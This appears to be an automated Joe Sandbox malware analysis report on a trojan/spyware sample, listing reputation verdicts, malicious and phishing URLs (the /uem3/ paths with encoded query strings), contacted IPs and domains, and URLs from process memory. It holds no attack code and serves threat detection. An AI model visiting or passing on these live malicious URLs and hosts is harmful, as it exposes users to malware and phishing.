http://www.typography.netD	0%	URL Reputation	safe
http://www.xjyjjy.com/uem3/	100%	Avira URL Cloud	malware
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.carterandcone.comonaN	0%	Avira URL Cloud	safe
http://www.carterandcone.comnlo2	0%	Avira URL Cloud	safe
http://www.carterandcone.com:	0%	Avira URL Cloud	safe
https://go.microsoft	0%	Avira URL Cloud	safe
http://www.astrofrance.online/uem3/?BpE=hw9wdlgRPJgu6mhEw3v3abu2JdZhLnzfTKsoEzFZGCpKAu6wx+OREaAyoHMqAY/6AEPW&SH=IDKTKDM	100%	Avira URL Cloud	phishing
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.duckholland.com/uem3/	0%	Avira URL Cloud	safe
http://www.carterandcone.comS	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.duckholland.com	0%	Avira URL Cloud	safe
http://www.fontbureau.comaO	0%	Avira URL Cloud	safe
http://www.carterandcone.comd	0%	URL Reputation	safe
http://www.carterandcone.como.S	0%	Avira URL Cloud	safe
http://www.carterandcone.comnse~	0%	Avira URL Cloud	safe
http://www.timinis23.com/uem3/?SH=IDKTKDM&BpE=0e5ylS0mR5Iv24OzcR2s4uNeaAp+yJmWD1izpzSJBOsV3UDfR6yWX1PKUNeuwqbGEXMx	0%	Avira URL Cloud	safe
http://www.duckholland.com/uem3/?SH=IDKTKDM&BpE=4t2Z3lNwjnLZlDwEEC0m8LkRlQI0Pl9ucZSXJIF5IRDrQEKlG6sw6AjHC30zWhIZsVHq	0%	Avira URL Cloud	safe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt	0%	URL Reputation	safe
http://www.homesteaddesignstudio.net/uem3/	100%	Avira URL Cloud	malware
http://en.wikip	0%	URL Reputation	safe
http://www.fontbureau.come.com	0%	URL Reputation	safe
http://www.xjyjjy.com/uem3/?BpE=Kc68PjQ5YLKhI5YJGbmTtSVcH4y3rSoSs1SAKTtyyAoVNP+YqbFEGdxEoFZf0m2HIavw&SH=IDKTKDM	100%	Avira URL Cloud	malware
http://www.astrofrance.online/uem3/	100%	Avira URL Cloud	phishing
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.comtig7	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.monotype.	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.zhongyicts.com.cno.	0%	URL Reputation	safe
http://www.domainedelapoujade.info/uem3/	0%	Avira URL Cloud	safe
www.boxingfishstudios.com/uem3/	100%	Avira URL Cloud	malware
http://www.founder.com.cn/cn#	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.duckholland.com	154.94.246.226	true	true	unknown
xjyjjy.com.lo1442.faipod.com	101.36.112.119	true	true	unknown
www.astrofrance.online	188.114.96.6	true	true	unknown
www.timinis23.com	199.192.23.166	true	true	unknown
www.chahuajie.com	45.199.106.100	true	false	unknown
www.domainedelapoujade.info	213.186.33.5	true	true	unknown
homesteaddesignstudio.net	34.102.136.180	true	false	unknown
www.homesteaddesignstudio.net	unknown	unknown	true	unknown
www.xjyjjy.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.domainedelapoujade.info/uem3/?SH=IDKTKDM&BpE=V2TDWYSqi/8fdllEzj4AbTg97NFaRkku6BamUZomS0y+YREnVG6xukPcgSdf2jxlzQp6	true	Avira URL Cloud: safe	unknown
http://www.xjyjjy.com/uem3/	true	Avira URL Cloud: malware	unknown
http://www.astrofrance.online/uem3/?BpE=hw9wdlgRPJgu6mhEw3v3abu2JdZhLnzfTKsoEzFZGCpKAu6wx+OREaAyoHMqAY/6AEPW&SH=IDKTKDM	true	Avira URL Cloud: phishing	unknown
http://www.duckholland.com/uem3/	true	Avira URL Cloud: safe	unknown
http://www.timinis23.com/uem3/?SH=IDKTKDM&BpE=0e5ylS0mR5Iv24OzcR2s4uNeaAp+yJmWD1izpzSJBOsV3UDfR6yWX1PKUNeuwqbGEXMx	true	Avira URL Cloud: safe	unknown
http://www.duckholland.com/uem3/?SH=IDKTKDM&BpE=4t2Z3lNwjnLZlDwEEC0m8LkRlQI0Pl9ucZSXJIF5IRDrQEKlG6sw6AjHC30zWhIZsVHq	true	Avira URL Cloud: safe	unknown
http://www.homesteaddesignstudio.net/uem3/	false	Avira URL Cloud: malware	unknown
http://www.xjyjjy.com/uem3/?BpE=Kc68PjQ5YLKhI5YJGbmTtSVcH4y3rSoSs1SAKTtyyAoVNP+YqbFEGdxEoFZf0m2HIavw&SH=IDKTKDM	true	Avira URL Cloud: malware	unknown
http://www.astrofrance.online/uem3/	true	Avira URL Cloud: phishing	unknown
http://www.domainedelapoujade.info/uem3/	true	Avira URL Cloud: safe	unknown
www.boxingfishstudios.com/uem3/	true	Avira URL Cloud: malware	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.carterandcone.comGEn	e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438290217.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438640428.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438614133.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.comgra	e6o7hKFmfC.exe, 00000000.00000003.438168160.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.com#	e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438554979.0000000005E96000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779	cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/static/images/favicons/favicon-16x16.png	cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.tiro.com	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.com	e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439170379.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439860558.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438312891.0000000005E96000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438290217.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439065755.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438755140.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439692166.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438640428.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438614133.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438847612.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438929027.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439255790.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438986162.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439388179.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439307215.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438739890.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.msn.com/ocid=iehp	cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1d	cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/chrome/	cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cno	e6o7hKFmfC.exe, 00000000.00000003.437245856.0000000005E71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0e/	cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://fontfabrik.com	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comonaN	e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438554979.0000000005E96000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852	cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.carterandcone.comnlo2	e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438640428.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438614133.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.com:	e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439170379.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439860558.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439065755.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438755140.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439692166.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438640428.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438614133.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438847612.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438929027.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439255790.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438986162.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439388179.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439307215.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438739890.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/common/oauth2/authorizeclient_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e3	cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://go.microsoft	cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comS	e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438290217.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438640428.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438614133.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.msn.com/de-ch/?ocid=iehp3	cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.msn.com/de-ch/?ocid=iehp2	cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.sakkal.com	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.msn.com/de-ch/ocid=iehp	cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.duckholland.com	cmmon32.exe, 0000000B.00000002.706735931.000000000514B000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000002.459054252.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.comaO	e6o7hKFmfC.exe, 00000000.00000002.459054252.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comd	e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439170379.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439860558.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.440182089.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.440135163.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439065755.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.440265450.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.440237394.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.440299478.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.440039450.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438755140.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439692166.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438640428.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438614133.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438847612.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438929027.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439992280.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439255790.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438986162.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.439960727.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.440015688.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.como.S	e6o7hKFmfC.exe, 00000000.00000003.438226165.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comnse~	e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438640428.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438614133.0000000005E94000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=	cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt	cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000003.626110897.00000000067B7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C	cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://en.wikip	e6o7hKFmfC.exe, 00000000.00000003.437236805.0000000005E90000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.come.com	e6o7hKFmfC.exe, 00000000.00000002.459054252.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comtig7	e6o7hKFmfC.exe, 00000000.00000003.438548022.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438554979.0000000005E96000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/de-ch/?ocid=iehp	cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	e6o7hKFmfC.exe, 00000000.00000003.437245856.0000000005E71000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.437668000.0000000005E6D000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.437236805.0000000005E90000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.437107481.0000000005E8F000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.437096815.0000000005E8D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1X	cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-jones.html	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g	cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.monotype.	e6o7hKFmfC.exe, 00000000.00000003.445955530.0000000005E70000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cno.	e6o7hKFmfC.exe, 00000000.00000003.438080072.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.438008682.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	e6o7hKFmfC.exe, 00000000.00000002.467496595.0000000007072000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.msn.com/?ocid=iehp7	cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/static/images/favicons/favicon-16x16.png6Ouq	cmmon32.exe, 0000000B.00000002.704546631.00000000028D4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.msn.com/de-ch/?ocid=iehpx	cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/	e6o7hKFmfC.exe, 00000000.00000003.441052646.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.msn.com/de-ch/?ocid=iehpu	cmmon32.exe, 0000000B.00000002.704427136.00000000028AB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn#	e6o7hKFmfC.exe, 00000000.00000003.437107481.0000000005E8F000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000003.437096815.0000000005E8D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.96.6	www.astrofrance.online	European Union	13335	CLOUDFLARENETUS	true
213.186.33.5	www.domainedelapoujade.info	France	16276	OVHFR	true
199.192.23.166	www.timinis23.com	United States	22612	NAMECHEAP-NETUS	true
101.36.112.119	xjyjjy.com.lo1442.faipod.com	China	135377	UHGL-AS-APUCloudHKHoldingsGroupLimitedHK	true
34.102.136.180	homesteaddesignstudio.net	United States	15169	GOOGLEUS	false
154.94.246.226	www.duckholland.com	Seychelles	396076	ROOT-NETWORKSUS	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	649925
Start date and time: 21/06/202221:06:13	2022-06-21 21:06:13 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	e6o7hKFmfC (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/2@7/6
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 29.9% (good quality ratio 28.2%) Quality average: 70% Quality standard deviation: 30.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 40 Number of non-executed functions: 7
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:07:36	API Interceptor	2x Sleep call for process: e6o7hKFmfC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
213.186.33.5	Dekont1.exe	Get hash	malicious	Browse	www.bokag.fr/g3t1/?_ZVX=o6JL&E2J4_4l=Crxnf/7+A/o8BBHd5PY+VkKMu9rM8OqkmMUE7B2cR5ndb+ILcT5LFeqtdTYif0McicrO
	sxwJhFA5pT.exe	Get hash	malicious	Browse	www.lychee.solutions/tgdh/?rX_HQ=6loTtptH&6l=UlKbuswgrfoGxTwl3lQ89d1PQ+7W2P8S37SPW6DNTgO9xwcGerRxB5UERPQKgLKeWhUdNon6Nw==
	i32uCoJmoc.exe	Get hash	malicious	Browse	www.lychee.solutions/tgdh/?zN6=2dl4dRq8&l6R8xh7=UlKbuswgrfoGxTwl3lQ89d1PQ+7W2P8S37SPW6DNTgO9xwcGerRxB5UERPczsqmeBnIM
	jLVXJRVrps.exe	Get hash	malicious	Browse	www.undisclosed.email/vweq/?7nth=w6YXkXlp3B&T2M4SPdx=FK6kt+HrwJc/OuFWziPolRzwMkfrR3lwDITKWvEhFb2qrYIvNsGRyTpKRTHo73/Xj7f6
	fZ6M52S01p.exe	Get hash	malicious	Browse	www.lychee.solutions/tgdh/?4h=UlKbuswgrfoGxTwl3lQ89d1PQ+7W2P8S37SPW6DNTgO9xwcGerRxB5UERM8jjL2mfChL&qXjD=2dpxpf
	dlddRLfKwf.exe	Get hash	malicious	Browse	www.lychee.solutions/tgdh/?2dI8g=C48xWv&xXRHHrYP=UlKbuswgrfoGxTwl3lQ89d1PQ+7W2P8S37SPW6DNTgO9xwcGerRxB5UERM8jjL2mfChL
	B828FF4CE329B128041C89F4963379530029C653FAE64.exe	Get hash	malicious	Browse	www.aziri.xyz/
